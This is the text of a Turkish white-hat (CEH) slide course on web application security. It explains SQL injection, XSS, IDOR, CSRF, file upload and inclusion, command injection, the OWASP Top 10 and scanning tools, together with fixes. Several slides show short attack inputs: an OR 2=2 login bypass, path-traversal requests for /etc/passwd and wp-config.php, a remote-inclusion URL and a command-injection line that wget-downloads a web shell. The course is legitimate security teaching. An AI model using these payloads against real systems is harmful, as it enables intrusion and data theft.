• Ayrıca bu zafiyeti kullanıp sisteme zararlı dosya yükleyebilir ve sistemi ele geçirebilir.
• Teknik anlamda veri ifşasıyla sonuçlanacak bir saldırı firmayı ciddi manada itibar kaybına ve maddi kayba neden
olabilir.

www.prismacsi.com
12
5
www.prismacsi.com
12
5
www.prismacsi.com
12
5
www.prismacsi.com
12
5
Uygulama – Login Bypass
• Kullanıcı site üzerinde kullanıcı adı ve parola bilgilerini girip ardından Giriş Yap butonuna tıklar.
• Uygulama sunucusu bu bilgileri alır ve Veritabanı üzerinde bu bilgilerin doğruluğuna dair sorgu işlemi
gerçekleştirir.
• Eğer bilgiler doğru girilmişse TRUE değeri döner ve yetki içi Cookie atanır. Eğer bilgiler yanlış girilmişse FALSE
değeri döner ve Kullanıcı adı veya Parola yanlış şeklinde uyarı verir.
hakan 123456
Sunucu Veritabanı
eposta=hakan&parola=123456
SELECT * FROM USERS WHERE
EPOSTA=hakan AND
PAROLA=123456;
FALSEKullanıcı adı veya Parola yanlış
1 2
34İstemci

www.prismacsi.com
12
6
www.prismacsi.com
12
6
www.prismacsi.com
12
6
www.prismacsi.com
12
6
Uygulama – Login Bypass
• Saldırgan site üzerinde input alanlarına SQL komutu içeren içerik yazıp Giriş Yap butonuna tıklar.
• Uygulama sunucusu bu bilgileri alır ve Veritabanı üzerinde bu bilgilerin doğruluğuna dair sorgu işlemi
gerçekleştirir.
• Saldırgandan alınan input her halükarda TRUE değer döndürür.
• Bundan ötürü veritabanı Sunucuya TRUE değeri döndürür ve Uygulama sunucusu Cookie atayarak kullanıcıyı
yetkilendirir.
hakan 123456
İstemci Sunucu Veritabanı
eposta=hakan&parola=123456’ OR 2=2
SELECT * FROM USERS WHERE
EPOSTA=hakan AND
PAROLA=123456’ OR 2=2;
TRUESet-Cookie: SessionId=…
1 2
34

www.prismacsi.com
12
7
www.prismacsi.com
12
7
www.prismacsi.com
12
7
www.prismacsi.com
12
7
SQL Injection Zafiyetinin Çözümü Nedir?
• SQL sorgularını direk olarak işlemek yerine parametreli kullanım şeklinde kullanmak gerekmektedir.
• Buna ek olarak kullanıcıdan gelen tüm veriler white-list (beyaz liste) yöntemine göre işletilerek işleme alınabilir.
• Stored Prosedure yöntemi kullanarak bu zafiyetin önüne geçmek mümkündür.

www.prismacsi.com
12
8
www.prismacsi.com
12
8
www.prismacsi.com
12
8
www.prismacsi.com
12
8
SQL Injection Korunma Yolları
• Worse Code
SELECT account_balance FROM user_data WHERE user_name = + request.getParameter("customerName");
• Best Code
SELECT account_balance FROM user_data WHERE user_name = ?;
command.Parameters.Add(new OleDbParameter("user_name", CustomerName Name.Text));

www.prismacsi.com
12
9
www.prismacsi.com
12
9
www.prismacsi.com
12
9
www.prismacsi.com
12
9
SQL Injection
Uygulama

www.prismacsi.com
13
0
www.prismacsi.com
13
0
www.prismacsi.com
13
0
www.prismacsi.com
13
0
Cross Site Scripting (XSS)

www.prismacsi.com
13
1
www.prismacsi.com
13
1
www.prismacsi.com
13
1
www.prismacsi.com
13
1
XSS Zafiyeti Nedir?
• Web uygulaması üzerinde, kullanıcıdan gelen verilerin herhangi bir işlemden geçmeden direk olarak
ekrana basılması durumunda, tarayıcılar tarafından bu veriler uygulama kodu olarak kabul edilir ve
işletilir. Bunun sonucunda bu bölümler Javascript gibi tarayıcı tarafından yorumlanan dillerle manipüle
edilerek kötüye kullanılır ve XSS zafiyetinden söz edilir.
• Javascript haricinde VBScript gibi tarayıcıların yorumladığı diğer programlama dilleriylede bu zafiyet
tetiklenebilir.

www.prismacsi.com
13
2
www.prismacsi.com
13
2
www.prismacsi.com
13
2
www.prismacsi.com
13
2
XSS Zafiyetinin Sebebi Nedir?
• Web uygulaması üzerinde, kullanıcıdan beklenen girdilerin hiçbir filtreleme işlemine sokulmadan aynı
şekilde kullanıcıya yansıtılması durumunda bu zafiyet ortaya çıkmaktadır.

www.prismacsi.com
13
3
www.prismacsi.com
13
3
www.prismacsi.com
13
3
www.prismacsi.com
13
3
XSS Zafiyet Türleri Nelerdir?
• Literatürde Reflected, Stored ve DOM Based şeklinde 3 farklı XSS türü vardır.
• Reflected XSS: Bu saldırı tipinde Javascript kodlarının kullanıcı tarafından bir linke tıklanarak tetiklenmesi
sağlanır.
• Stored XSS: Javascript kodları bir kere uygulamaya eklenir. Daha sonra bu sayfaya erişen her tarayıcıda bu
Javascript kodları çalıştırılır. Myspace örneği.
• DOM Based XSS: DOM nesnesi üzerinden Javascript kodlarının çalıştırılmasıdır. Örneğin sayfa içerisinde
gezinmemizi sağlayan #(anchor) nesnesi bu zafiyete örnek olarak verilebilir.

www.prismacsi.com
13
4
www.prismacsi.com
13
4
www.prismacsi.com
13
4
www.prismacsi.com
13
4
XSS Zafiyetinin Zararları Nedir?
• Bu zafiyet ile birlikte saldırganlar kullanıcıların oturum bilgilerini çalabilir, tarayıcıyı ele geçirebilir, browser
üzerinden farklı sistemlere saldırıda bulunabilir, kısacası Javascript kullanarak yapılabilecek her türlü
işlemi gerçekleştirebilir.

www.prismacsi.com
13
5
www.prismacsi.com
13
5
www.prismacsi.com
13
5
www.prismacsi.com
13
5
XSS Zafiyetinin Çözümü Nedir?
• Kullanıcıya sunulan metinler Output Encoding işleminden geçirilerek sunulmalıdır. Böylece tarayıcılar özel
karakterlerin bulunduğu girdileri komutmuş gibi algılamayacak ve işletmeyecektir.
• Script tagları içerisine kullanıcıdan gelebilecek olan değerler direkt olarak yazılmamalıdır.

www.prismacsi.com
13
6
www.prismacsi.com
13
6
www.prismacsi.com
13
6
www.prismacsi.com
13
6
XSS - Uygulamalar
• The Browser Exploitation Framework (BeEF)
• Reflected XSS
• Stored XSS
• DOM Based XSS
• Keylogger

www.prismacsi.com
13
7
www.prismacsi.com
13
7
www.prismacsi.com
13
7
www.prismacsi.com
13
7
XSS - Uygulamalar
• BeEF dışında hazır XSS payloadları için www.xss-payloads.com sitesinden payloadlara erişim sağlanabilir.

www.prismacsi.com
13
8
www.prismacsi.com
13
8
www.prismacsi.com
13
8
www.prismacsi.com
13
8
Insecure Direct Object
References (IDOR)

www.prismacsi.com
13
9
www.prismacsi.com
13
9
www.prismacsi.com
13
9
www.prismacsi.com
13
9
Insecure Direct Object References (IDOR) Zafiyeti Nedir?
• Kullanıcının yetkisi haricindeki dosyalara erişim sağlayabilmesi durumunda bu zafiyetten söz edilebilir.
Kendi banka hesap profilinizdeyken başkalarının banka hesap bilgilerini görebilmeniz bu zafiyete güzel bir
örnek olabilir.
• Yaşanmış hikaye: Fatura senaryosu

www.prismacsi.com
14
0
www.prismacsi.com
14
0
www.prismacsi.com
14
0
www.prismacsi.com
14
0
IDOR Zafiyetinin Sebebi Nedir?
• Kullanıcıların yaptıkları istekleri yetki kontrolüne (authentication) göre kontrol etmeden yalnızca kimlik
doğrulaması yaparak (authorization) kontrol edilip işleme alınması zafiyetin ana sebebidir.
• Ayrıca yapılan isteklerin ID gibi değişkenlere bağlı olarak yapılması bu zafiyeti tetiklemektedir.

www.prismacsi.com
14
1
www.prismacsi.com
14
1
www.prismacsi.com
14
1
www.prismacsi.com
14
1
IDOR Zafiyetinin Zararları Nedir?
• Bu zafiyet ile birlikte saldırganlar yetkisi dahilinde olmayan işlemleri gerçekleştirebileceği için ilk akla
gelen senaryolar; başkalarına ait gizli dosyaları ele geçirebilir, bankacılık gibi finansal uygulamalarda
başka kişilere ait hesap bilgilerini görebilir ve başka kullanıcıların parola bilgilerini değiştirip sisteme
erişim sağlayabilir. Bu durumlar sonucunda firma büyük oranda maddi kayba ve itibar kaybına
uğrayabilir.

www.prismacsi.com
14
2
www.prismacsi.com
14
2
www.prismacsi.com
14
2
www.prismacsi.com
14
2
IDOR Zafiyetinin Çözümü Nedir?
• Uygulama fonksiyonlarına yapılan her sorguda mutlaka yetki kontrollerinin doğru bir şekilde yapılıyor
olması gerekmektedir.
• Yapılan istekler mümkünse ID gibi değişkenler üzerinden değil yetki dahilinde fonksiyonlar üzerinden
gerçekleştirilmelidir.

www.prismacsi.com
14
3
www.prismacsi.com
14
3
www.prismacsi.com
14
3
www.prismacsi.com
14
3
IDOR
Uygulama

www.prismacsi.com
14
4
www.prismacsi.com
14
4
www.prismacsi.com
14
4
www.prismacsi.com
14
4
CSRF

www.prismacsi.com
14
5
www.prismacsi.com
14
5
www.prismacsi.com
14
5
www.prismacsi.com
14
5
CSRF (Cross-Site Request Forgery)
• Tarayıcılar, bir siteye istek yapıldığında öncelikle kendi üzerinde bu site ile iligli herhangi bir cookie olup
olmadığını kontrol ederler. Eğer cookie mevcutsa yapılan istekte HTTP başlık bilgisine bu Cookie değeri
eklenip istekte bulunulur. Bu mekanizma sayesinde web uygulamalarına durum kontrolü kazanmış olur ve
örneğin sürekli olarak sisteme giriş için kullanıcı adı parola girmeye gerek kalmaz.

www.prismacsi.com
14
6
www.prismacsi.com
14
6
www.prismacsi.com
14
6
www.prismacsi.com
14
6
• Saldırgan kişiler bu mekanizmayı kötüye kullanmak için hedef web uygulamasında işlem yapan kodların
bulunduğu bir sayfa hazırlanır. Kurbanlar, bu sayfayı ziyaret ederek farkında olmadan arka planda hedef
sisteme istekte bulunmuş olurlar. İstek sırasında tarayıcı da Cookie bilgisini eklediğinden bir anda web
uygulaması üzerinde yetkili bir kullanıcıyla işlem yapılmış olunur.
• Burada zafiyetin temel sebebi kullanıcıdan gelen isteklerin istek başına tek kullanımlık özel bir token
kullanılmadan sadece Cookie ve Session bilgisiyle yapılmasından kaynaklandığı görülmektedir.

www.prismacsi.com
14
7
www.prismacsi.com
14
7
www.prismacsi.com
14
7
www.prismacsi.com
14
7
• Hedef sistemin bir bankacılık uygulaması olduğu ve yapılan işlemin para aktarma işlemi olduğu
düşünülürse zafiyetin ne denli zararlı olduğu görülebilir.
• Zafiyetin bulunduğu tüm fonksiyonlar (Para aktarma, kullanıcı ekleme, kullanıcı silme, hesap açma vb.) bu
zafiyet ile birlikte tetiklenebilir.

www.prismacsi.com
14
8
www.prismacsi.com
14
8
www.prismacsi.com
14
8
www.prismacsi.com
14
8
• CSRF Token mekanizması doğru bir şekilde kullanılarak bu zafiyet çözüme kavuşturulabilir.
• Token’ın her istek sonrasında yenilendiğinden emin olunmalıdır.
• Token’ların tek kullanım hakkı olduğu ve buna göre işlem yapılması gerekmektedir.

www.prismacsi.com
14
9
www.prismacsi.com
14
9
www.prismacsi.com
14
9
www.prismacsi.com
14
9
CSRF
Uygulama

www.prismacsi.com
15
0
www.prismacsi.com
15
0
www.prismacsi.com
15
0
www.prismacsi.com
15
0
FileUpload Zafiyeti Nedir?
• Saldırgan kişilerin sisteme zararlı dosya (genellikle shell, web shell şeklinde isimlendirilir) yüklemesidir.
• Oldukça tehlikeli ve saldırgana sisteme erişim verecek bir zafiyet tipidir.
• Genelde testler sırasında bir dosya yükleme alanı gördüğümüzde yüzümüzde küçük bir tebessüm oluşuyor
J

www.prismacsi.com
15
1
www.prismacsi.com
15
1
www.prismacsi.com
15
1
www.prismacsi.com
15
1
FileUpload Zafiyetinin Sebebi Nedir?
• Kullanıcıdan gelen dosyaların güvenli kabul edilerek ve hiçbir kontrolden geçirmeyerek sisteme yüklenmesi
bu zafiyetin ana sebebidir.
• Örneğin resim beklenen bölüme php kodu içeren bir dosya yüklenmesi.
• Yapılan kontrollerin yetersiz olması da zafiyete sebep olabilir.
• Blacklist yöntemi de aynı şekilde.

www.prismacsi.com
15
2
www.prismacsi.com
15
2
www.prismacsi.com
15
2
www.prismacsi.com
15
2
FileUpload Zafiyetinin Zararları Nedir?
• Çok tehlikeli bir zafiyettir.
• Yüklenen Shell’in içeriğine göre işlemler yapılabilir.
• Çoğu senaryoda sistemler ele geçirilmektedir.
• İç networke geçiş için kullanılabilecek bir nokta.

www.prismacsi.com
15
3
www.prismacsi.com
15
3
www.prismacsi.com
15
3
www.prismacsi.com
15
3
FileUpload Zafiyetinin Çözümü Nedir?
• Kullanıcıdan gelen tüm dosyaların istenen formatta olup olmadığı kontrol edilmelidir. (Uzantı kontrolü)
• Yüklenen dosyaların mime type kontrolü yapılmalıdır.
• Dosyalar whitelist metoduna göre kabul edilmelidir.
• Dosyanın yüklendiği dizin kullanıcıya gösterilmemeli ve dışarıdan erişilebilir olmamalıdır.
• Dosya yüklenirken isim rastgele isim atanmalıdır.

www.prismacsi.com
15
4
www.prismacsi.com
15
4
www.prismacsi.com
15
4
www.prismacsi.com
15
4
File Upload
Uygulama

www.prismacsi.com
15
5
www.prismacsi.com
15
5
www.prismacsi.com
15
5
www.prismacsi.com
15
5
File Inclusion Zafiyeti Nedir?
• Remote File Inclusion
• Uzak sunucuda bulunan bir dosyanın web uygulaması üzerinden çağırılmasıdır.
• Eğer çağırılan dosyanın içeriği uygulama sunucusunda yorumlanan bir içerikse (örneğin PHP) bu
içerik sunucu tarafından yorumlanır ve öyle sunulur. WEB SHELL!
• http://site/rfi.php?file=http://zararli/rfi_url
• Local File Inclusion
• Yerel sunucuda bulunan bir dosyanın web uygulaması üzerinden çağırılmasıdır.
• Genellikle config dosyaları, sisteme yüklenen shell dosyaları, gizli bilgi içerebilecek dosyalara erişim
sağlanmaya çalışılır.
• http://site/index.php?file=../../../../etc/passwd
• http://site/index.php?file=../wp-config.php

www.prismacsi.com
15
6
www.prismacsi.com
15
6
www.prismacsi.com
15
6
www.prismacsi.com
15
6
File Inclusion Zafiyetinin Sebebi Nedir?
• Bu zafiyetin temel sebebi çağırılan dosyaların yeteri kadar kontrol edilmemesinden kaynaklanmaktadır.
Örneğin çağırılan dosya aynı domainde mi bulunuyor?
• Çağırılan dosya adresinde özel karakter (. / gibi) barınıyor mu?
• Belirtilen dosya isimleri dışında başka dosyalara erişim sağlanıyor mu? gibi

www.prismacsi.com
15
7
www.prismacsi.com
15
7
www.prismacsi.com
15
7
www.prismacsi.com
15
7
File Inclusion Zafiyetinin Zararları Nedir?
• Zafiyet ile birlikte saldırganlar web uygulamasının çalıştırıldığı uygulama yetkileri dahilinde sistemdeki
kritik dosyalara erişim sağlayabilir, buradaki verileri kullanarak sistemi tamamen ele geçirebilir.

www.prismacsi.com
15
8
www.prismacsi.com
15
8
www.prismacsi.com
15
8
www.prismacsi.com
15
8
File Inclusion Zafiyetinin Çözümü Nedir?
• Çağırılan tüm dosyalar için belirli kontroller (istenen dosya yetki seviyesine uyuyor mu? Dosya aynı
domainde mi? vb) yapılmalıdır.
• Çağırılan dosyalar, sayfalar direk kendi ismiyle birlikte çağırılmamalıdır.

www.prismacsi.com
15
9
www.prismacsi.com
15
9
www.prismacsi.com
15
9
www.prismacsi.com
15
9
File Inclusion
Uygulama

www.prismacsi.com
16
0
www.prismacsi.com
16
0
www.prismacsi.com
16
0
www.prismacsi.com
16
0
Command Injection Zafiyeti Nedir?
• Saldırgan kişilerin, sistem komutu çalıştırılan bölümleri manipüle ederek zararlı sisteme komut çalıştırma
işlemidir.
• index.php?dosya=flag.txt
• index.php?dosya=flag.txt;ls –la
• index.php?dosya=flag.txt;wget http://site.com/shell.php

www.prismacsi.com
16
1
www.prismacsi.com
16
1
www.prismacsi.com
16
1
www.prismacsi.com
16
1
Command Injection Zafiyetinin Sebebi Nedir?
• Uygulama üzerinde, sistem komutu çalıştırılan bölümlerde kullanıcıdan gelen verileri yeterli kontrol
gerçekleştirmeden çalıştırılması bu zafiyetin ana sebebidir.

www.prismacsi.com
16
2
www.prismacsi.com
16
2
www.prismacsi.com
16
2
www.prismacsi.com
16
2
Command Injection Zafiyetinin Zararları Nedir?
• Bu zafiyet ile sistem kodu çalıştırılabilindiği için sistemin büyük oranda ele geçirilme riski bulunmaktadır.
• Kritik seviye bir zafiyettir.
• Hacker bilgi ve yetenekleri ile doğru orantılı bir şekilde bu zafiyeti büyük bir koza dönüştürebilir.

www.prismacsi.com
16
3
www.prismacsi.com
16
3
www.prismacsi.com
16
3
www.prismacsi.com
16
3
Command Injection Zafiyetinin Çözümü Nedir?
• Sistem komutu kullanan yerlerde sistem komutu kullanmadan işlerin çözümü araştırılmalı ve mümkünse
sistem komutları çalıştırılmadan işlemler yapılmaya çalışılmalı.
• Sistem komutu çalıştırılması gereken durumlarda direk olarak sistem komutu kullanmak yerine
frameworklerin sağladığı özel fonksiyonlar kullanılmalıdır.
• Kullanıcıdan gelen veriler whitelist metoduna göre değerlendirilmeli ve ona göre işleme alınmalıdır.

www.prismacsi.com
16
4
www.prismacsi.com
16
4
www.prismacsi.com
16
4
www.prismacsi.com
16
4
Command Injection
Uygulama

www.prismacsi.com
16
5
www.prismacsi.com
16
5
www.prismacsi.com
16
5
www.prismacsi.com
16
5
Uygulama Sunucu Zafiyetleri
• Web uygulamalarında zafiyetler her zaman kodlardaki açıklıklardan gerçekleşmez. Bazen de uygulama
sunucusu üzerinde zafiyet bulunabilir.
• Apache - Uygulama
• Tomcat - Uygulama
• Nginx - Uygulama
• IIS - Uygulama

www.prismacsi.com
16
6
www.prismacsi.com
16
6
www.prismacsi.com
16
6
www.prismacsi.com
16
6
DoS Zafiyetleri
• Web uygulamaları üzerinde uygulama sunucusu ve yanlış kodlamaların sebep olduğu Servis Dışı Bırakma
zafiyetleri bulunabilir.
• MS15-034 IIS DoS Zafiyeti
• Mantıksal DoS - Kredi hesaplama örneği
• Uygulama

www.prismacsi.com
16
7
www.prismacsi.com
16
7
www.prismacsi.com
16
7
www.prismacsi.com
16
7
Oturum Yönetiminden Kaynaklanan Zafiyetler
• Web uygulaması içerisinde bilindik zafiyetlerin haricinde oturum yönetimi düzgün yapılmazsa bruteforce
saldırıları gibi çeşitli yöntemlerle kullanıcıların hesapları ele geçirilebilir.
• Basit Session Mekanizması – Bruteforce Uygulama
• Session Sabitleme – Uygulama

www.prismacsi.com
16
8
www.prismacsi.com
16
8
www.prismacsi.com
16
8
www.prismacsi.com
16
8
Brute Force Saldırıları
• Birçok web uygulaması kullanıcı giriş bölümü içermektedir. Gerekli önlemler alınmadığı taktirde çeşitli
uygulamalar kullanılarak buralara bruteforce saldırıları düzenlenebilir.
• Burpsuite Uygulama

www.prismacsi.com
16
9
www.prismacsi.com
16
9
www.prismacsi.com
16
9
www.prismacsi.com
16
9
OWASP TOP 10 2017

www.prismacsi.com
17
0
www.prismacsi.com
17
0
www.prismacsi.com
17
0
www.prismacsi.com
17
0
OWASP TOP 10
• A1 - Injection
• A2 - Broken Authentication
• A3 - Sensitive Data Exposure
• A4 - XML External Entities (XXE)
• A5 - Broken Access Control
• A6 - Security Misconfiguration
• A7 - Cross-Site Scripting (XSS)
• A8 - Insecure Deserialization
• A9 - Using Components with Known Vulnerabilities
• A10 - Insufficient Logging & Monitoring

www.prismacsi.com
17
1
www.prismacsi.com
17
1
www.prismacsi.com
17
1
www.prismacsi.com
17
1
OWASP TOP 10 - A1:Injection
• SQL, NoSQL, OS, LDAP injection gibi injection zafiyetleri zararlı içeriklerin uygulama üzerinde
direk olarak işlenmesi sonucu ortaya çıkar. Saldırgan kişiler bu zafiyeti kullanarak sistemde
yetkisiz bir şekilde işlemler gerçekleştirebilir.

www.prismacsi.com
17
2
www.prismacsi.com
17
2
www.prismacsi.com
17
2
www.prismacsi.com
17
2
OWASP TOP 10 - A2: Broken Authentication
• Uygulama fonksiyonlarındaki yetki kontrolü ve oturum yönetimi bölümlerinin eksik / hatalı
yapılması durumunda saldırgan kişilerin bu zafiyetlerden yararlanarak sisteme erişmesine
sebep olur.

www.prismacsi.com
17
3
www.prismacsi.com
17
3
www.prismacsi.com
17
3
www.prismacsi.com
17
3
OWASP TOP 10 - A3:Sensitive Data Exposure
• Çoğu web uygulaması ve API’lar finansal bilgiler, kişisel bilgiler gibi hassas bilgieri
koruyamazlar. Saldırganlar, kredi kartı sahtekarlığı, kimlik hırsızlığı gibi saldırılar için için zayıf
korumalı verileri çalabilir veya değiştirebilir. Hassas veriler saklanırken veya transfer
halindeyken ekstra güvenlik önlemleriyle güvenli hale getirilmelidir.

www.prismacsi.com
17
4
www.prismacsi.com
17
4
www.prismacsi.com
17
4
www.prismacsi.com
17
4
OWASP TOP 10 - A4:XML External Entities (XXE)
• Eski ve zayıf ayarlanmış XML işlemcileri, XML dokümanlarını external entity refence yöntemiyle
değerlendirir. External entities yerel dosyalara erişim sağlayarak hassas bilgilerin açığa
çıkmasına neden olabilir, uzaktan komut çalıştırabilir, port taraması yapabilir ve servis dışı
bırakmaya sebep olabilir.

www.prismacsi.com
17
5
www.prismacsi.com
17
5
www.prismacsi.com
17
5
www.prismacsi.com
17
5
OWASP TOP 10 - A5: Broken Access Control
• Sistemde oturum açmış kullanıcıların yetki seviyesi genellikle düzgün bir şekilde control edilmez.
Bunun sonucunda saldırgan kişiler başkalarına ait hassas dosyalara erişim sağlayabilir, bilgileri
değiştirip silebilir.

www.prismacsi.com
17
6
www.prismacsi.com
17
6
www.prismacsi.com
17
6
www.prismacsi.com
17
6
OWASP TOP 10 - A6: Security Misconfiguration
• Güvenlik ayarlarının doğru yapılandırılmamış olması en sık görülen zafiyetlerden biridir.
• Genellikle uygulamaların default ayarlarla kurulu bırakılması, kurulumların tamamlanmadan
bırakılması, HTTP headerları gibi bölümlerde bilgi açığa çıkması ya da hata sayfalarının bilgi
açığa çıkarması bu zafiyet kapsamına girer.

www.prismacsi.com
17
7
www.prismacsi.com
17
7
www.prismacsi.com
17
7
www.prismacsi.com
17
7
OWASP TOP 10 - A7: Cross-Site Scripting (XSS)
• XSS zafiyetleri, kullanıcıdan gelen güvensiz verilerin herhangi bir kontrolden geçmeden tekrar
tarayıcıya yansıtılması sonucu ortaya çıkar. Saldırgan kişiler böylece Javascript gibi tarayıcıda
yorumlanan teknolojileri kullanarak kullanıcılara zarar verebilirler.

www.prismacsi.com
17
8
www.prismacsi.com
17
8
www.prismacsi.com
17
8
www.prismacsi.com
17
8
OWASP TOP 10 - A8: Insecure Deserialization
• Güvensiz deserialization genellikle uzaktan kod çalıştırılmasına (RCE)’ye yol açar. Deserialization
zafiyetleri RCE ile sonuçlanmasa bile, injection saldırıları ve yetki yükseltme saldırıları
gerçekleştirmek için kullanılabilir.

www.prismacsi.com
17
9
www.prismacsi.com
17
9
www.prismacsi.com
17
9
www.prismacsi.com
17
9
OWASP TOP 10 - A9: Using Components with Known
Vulnerabilities
• Uygulama içerisinde çalışan eklentiler, kütüphaneler, frameworkler düzgün çalışması yetkili
kullanıcı haklarıyla çalıştırılması gerekebilir. Uygulama içerisinde çalışan bu bileşenlerde zafiyet
çıkması durumunda saldırganlar sisteme erişebilir ve very çalabilir.

www.prismacsi.com
18
0
www.prismacsi.com
18
0
www.prismacsi.com
18
0
www.prismacsi.com
18
0
OWASP TOP 10 - A10: Insufficient Logging & Monitoring
• İşlemleri loglamanın ve izlemenin yetersiz olduğu durumlarda sisteme sızan saldırganlar
sistemlerde uzun süre barınabilir. Sistemlerde uzun süre kalan saldırgan sistemi detaylı bir
şekilde inceleyebilir ve yatayda diğer sistemlere sıçrayabilir.

www.prismacsi.com
18
1
www.prismacsi.com
18
1
www.prismacsi.com
18
1
www.prismacsi.com
18
1
Otomatize Zafiyet Keşfi

www.prismacsi.com
18
2
www.prismacsi.com
18
2
www.prismacsi.com
18
2
www.prismacsi.com
18
2
Otomatize Zafiyet Keşfi - Netsparker
• Netsparker bilinen web uygulama zafiyetlerin çok büyük bir çoğunluğunu test ederek raporlayan
ve false pozitif oranı oldukça düşük milli gururumuz olan J mükemmel bir web uygulama
zafiyet tarayıcısıdır.
• Ücretlidir.
• Uygulama

www.prismacsi.com
18
3
www.prismacsi.com
18
3
www.prismacsi.com
18
3
www.prismacsi.com
18
3
Otomatize Zafiyet Keşfi - Acunetix
• Web uygulama zafiyet tarayıcısıdır.
• Ücretlidir.
• Uygulama

www.prismacsi.com
18
4
www.prismacsi.com
18
4
www.prismacsi.com
18
4
www.prismacsi.com
18
4
Otomatize Zafiyet Keşfi - Burpsuite
• Burpsuite çoğunlukla web proxy olarak kullanılan fakat Pro sürümüyle birlikte birçok zafiyeti
otomatize olarak tespit edebilen çok kullanışlı bir araçtır.
• Tarama işlemi yalnızca ücretli olan Pro sürümünde bulunmaktadır.

www.prismacsi.com
18
5
www.prismacsi.com
18
5
www.prismacsi.com
18
5
www.prismacsi.com
18
5
Otomatize Zafiyet Keşfi - Arachni
• Arachni open-source olarak geliştirilen, web arayüzü bulunan bir web uygulama güvenlik
tarayıcısıdır.

www.prismacsi.com
18
6
www.prismacsi.com
18
6
www.prismacsi.com
18
6
www.prismacsi.com
18
6
Otomatize Zafiyet Keşfi - Nessus
• Nessus web uygulama testlerinde genellikle web uygulama sunucusunun güvenliği test etmek
için kullanılan bir üründür.
• Ücretli sürümünün yanında Ücretsiz sürümleri bulunmaktadır.
• Uygulama

www.prismacsi.com
18
7
www.prismacsi.com
18
7
www.prismacsi.com
18
7
www.prismacsi.com
18
7
Otomatize Zafiyet Keşfi - Nikto
• Komut satırı üzerinden çalışan oldukça kullanışlı bir web uygulama güvenlik tarayıcısıdır.
• Uygulama

www.prismacsi.com
18
8
www.prismacsi.com
18
8
www.prismacsi.com
18
8
www.prismacsi.com
18
8
Sık Kullanılan Diğer Araçlar

www.prismacsi.com
18
9
www.prismacsi.com
18
9
www.prismacsi.com
18
9
www.prismacsi.com
18
9
Araçlar - wfuzz
• URL Fuzzing için kullanılır.
• Komut satırında çalışır.
• wfuzz -z list,robots.txt https://www.prismacsi.com/FUZZ
• Uygulama

www.prismacsi.com
19
0
www.prismacsi.com
19
0
www.prismacsi.com
19
0
www.prismacsi.com
19
0
Araçlar - dirbuster
• URL Fuzzing için kullanılır.
• Be Recursive kapatılması önerilir.
• Uygulama

www.prismacsi.com
19
1
www.prismacsi.com
19
1
www.prismacsi.com
19
1
www.prismacsi.com
19
1
Araçlar - sslscan
• SSL sertifikasının güvenliğini test etmek için
kullanılır.
• Uygulama

www.prismacsi.com
19
2
www.prismacsi.com
19
2
www.prismacsi.com
19
2
www.prismacsi.com
19
2
Araçlar - wpscan
• Wordpress’e özel geliştirilmiş bir zafiyet tarama
aracıdır.
• Login bruteforce işlemi gerçekleştirebilir.
• Uygulama

www.prismacsi.com
19
3
www.prismacsi.com
19
3
www.prismacsi.com
19
3
www.prismacsi.com
19
3
Araçlar - whatweb
• Site hakkında genel bilgilerin analiz edildiği bir
uygulamadır.
• Komut satırından çalışır.
• Uygulama

www.prismacsi.com
19
4
www.prismacsi.com
19
4
www.prismacsi.com
19
4
www.prismacsi.com
19
4
Kullanışlı Firefox Eklentileri
• Foxy Proxy: Hızlı bir şekilde proxy ayarı yapabilmemizi sağlar.
• HackBar: İçerisinde URL en birçok faydalı fonksiyonu bulunan bir eklentidir.
• Multi Open: Aynı anda verilen URL listesini sekmelerde sırayla otomatik olarak açar.
• ShowIP: Sitenin IP adresini görüntüler.
• User Agent Switcher: User Agent değiştirmek için kullanılır.
• Wappalyzer: Site içerisinde kullanılan teknolojiler hakkında bilgi verir.
• Cookie Manager+: Hızlıca Cookie değiştirmek için kullanılır.
• Tamper Data: Sunucuya giden veriyi değiştirip göndermemizi sağlar.

www.prismacsi.com
19
5
www.prismacsi.com
19
5
www.prismacsi.com
19
5
www.prismacsi.com
19
5
Uygulamalar

www.prismacsi.com
19
6
www.prismacsi.com
19
6
www.prismacsi.com
19
6
www.prismacsi.com
19
6
Sorular?

www.prismacsi.com
19
7
www.prismacsi.com
19
7
www.prismacsi.com
19
7
www.prismacsi.com
19
7
www.prismacsi.com
info@prismacsi.com
0 850 303 85 35
/prismacsi
İletişim

Beyaz Şapkalı Hacker CEH Eğitimi - Web Uygulama Güvenliği

Recommended

Recommended

More Related Content

More from PRISMA CSI

More from PRISMA CSI (9)

Beyaz Şapkalı Hacker CEH Eğitimi - Web Uygulama Güvenliği